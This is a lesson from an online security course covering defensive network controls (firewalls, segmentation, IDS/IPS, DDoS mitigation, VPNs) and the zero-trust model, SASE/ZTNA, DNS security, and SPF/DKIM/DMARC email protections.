Course Navigation
6 min read·Lesson 5 of 10

Network Security and Zero Trust

Learn the controls that protect networks — firewalls, segmentation, IDS/IPS, VPN — and the modern zero-trust model that supersedes them.

For decades, network security meant building a hard outer perimeter — firewalls at the edge, "trusted" networks inside. That model died with cloud, mobile, and remote work. This lesson covers both the classic controls (still widely deployed) and the modern zero-trust approach that's replacing them.

Firewalls

A firewall enforces rules about what traffic can flow between networks. Generations:

TypeInspectsExamples
Packet filterSource/dest IP and port, protocoliptables, AWS Security Groups
StatefulTracks connection state — replies are auto-allowednftables, almost every modern firewall
Application / Layer 7Understands HTTP, DNS, SMTP — can match URLs, methodsWeb Application Firewall (WAF)
Next-Gen Firewall (NGFW)App + user identity + threat intel + IDSPalo Alto, Fortinet, Check Point

In cloud, the equivalents are security groups (instance-level), NACLs (subnet-level on AWS), NSGs (Azure), and VPC firewall rules (GCP).

Network Segmentation

Don't put everything on one flat network. Segment so that compromise of one host doesn't grant access to all the others. Common patterns:

  • VLANs / subnets — corporate, guest, IoT, server tiers each isolated
  • DMZ — public-facing services in a network zone separate from internal systems
  • Microsegmentation — per-workload firewall rules, often enforced by a software-defined network (NSX, Calico, Cilium)
  • Air-gapped networks — physical separation, used for OT/ICS and classified systems

The key principle: limit lateral movement. An attacker who lands on a developer laptop should not be able to reach production databases.

IDS and IPS

  • Intrusion Detection System (IDS) — passively watches traffic, raises alerts. Snort, Suricata, Zeek.
  • Intrusion Prevention System (IPS) — sits inline; blocks malicious traffic in real time.

Both rely on signatures (known bad patterns), anomaly detection (deviations from baseline), or both. False positives are the perennial challenge — too noisy and analysts ignore them; too quiet and real attacks slip through.

DDoS Mitigation

Distributed denial-of-service attacks aim to exhaust bandwidth, connections, or compute. Defences:

  • Edge / CDN (Cloudflare, AWS Shield, Akamai) absorbs volumetric attacks across a global anycast network
  • Rate limiting per IP / per token at the application layer
  • SYN cookies and connection limits at the kernel
  • Geo-blocking traffic from regions where you have no users

VPNs

A VPN creates an encrypted tunnel over an untrusted network. Two flavours:

  • Site-to-site — connects two networks (HQ to AWS VPC, two data centres). Usually IPsec.
  • Remote access — individual user device tunnels into the corporate network. OpenVPN, WireGuard, Cisco AnyConnect.

Traditional VPNs have a flaw: once you're "in", the network treats you as trusted. This is exactly what zero trust rejects.

Zero Trust

The zero-trust model assumes the network is hostile — even your own LAN. Every request, regardless of source, must be authenticated, authorized, and encrypted. The motto: "never trust, always verify".

Core tenets (NIST SP 800-207):

  1. All data sources and computing services are resources to be protected
  2. All communication is secured regardless of network location
  3. Access is granted per-session, not per-network-position
  4. Access is determined by dynamic policy: identity, device posture, location, behaviour
  5. The enterprise monitors and measures the integrity of all owned and associated assets
  6. Authentication and authorization are dynamic and strictly enforced before access
  7. The enterprise collects telemetry to improve security posture

Practical implementation usually combines:

  • Identity-aware proxy in front of every internal app (Cloudflare Access, Google IAP, Tailscale)
  • Device posture (managed, encrypted, patched) checked at every connection
  • Continuous authentication — re-evaluate access if context changes
  • mTLS between services so each end proves its identity to the other

SASE and ZTNA

Secure Access Service Edge (SASE) bundles network and security at the cloud edge — SD-WAN, firewall-as-a-service, secure web gateway, CASB, ZTNA — replacing the traditional "MPLS to HQ to firewall" pattern. Zero Trust Network Access (ZTNA) is the access component: a cloud broker that authenticates the user, checks device posture, and proxies them to the specific app — no broad network access. Vendors: Cloudflare, Zscaler, Netskope, Palo Alto Prisma.

DNS Security

DNS is foundational and often overlooked:

  • DNSSEC signs records so resolvers can verify authenticity
  • DoH/DoT (DNS over HTTPS / TLS) encrypts DNS queries against eavesdropping
  • Protective DNS (Cloudflare 1.1.1.1, Quad9) blocks lookups of known-malicious domains
  • Egress filtering — only allow DNS queries via your sanctioned resolver

Email Security

Email remains the #1 delivery vector for phishing. The trio of standards every domain owner should publish:

  • SPF — which mail servers are allowed to send for your domain
  • DKIM — outgoing messages are cryptographically signed by the sender
  • DMARC — policy for what receivers should do when SPF/DKIM fail (quarantine, reject) plus reporting

Without these, anyone can spoof your domain. Set DMARC to p=reject once you've validated your senders.

Key Takeaways

  • Defence in depth on networks: perimeter firewall, segmentation, host firewalls, IDS/IPS, DNS filtering.
  • Network segmentation limits lateral movement — VLANs, security groups, microsegmentation.
  • IDS detects, IPS blocks; both can be signature- or anomaly-based.
  • VPNs provide encrypted tunnels (site-to-site, remote access); SASE/ZTNA replace them at the edge.
  • Zero trust: never trust based on network location — always authenticate and authorize per request.

Test your knowledge

Try exam-style practice questions to reinforce what you've learned.

Practice Questions →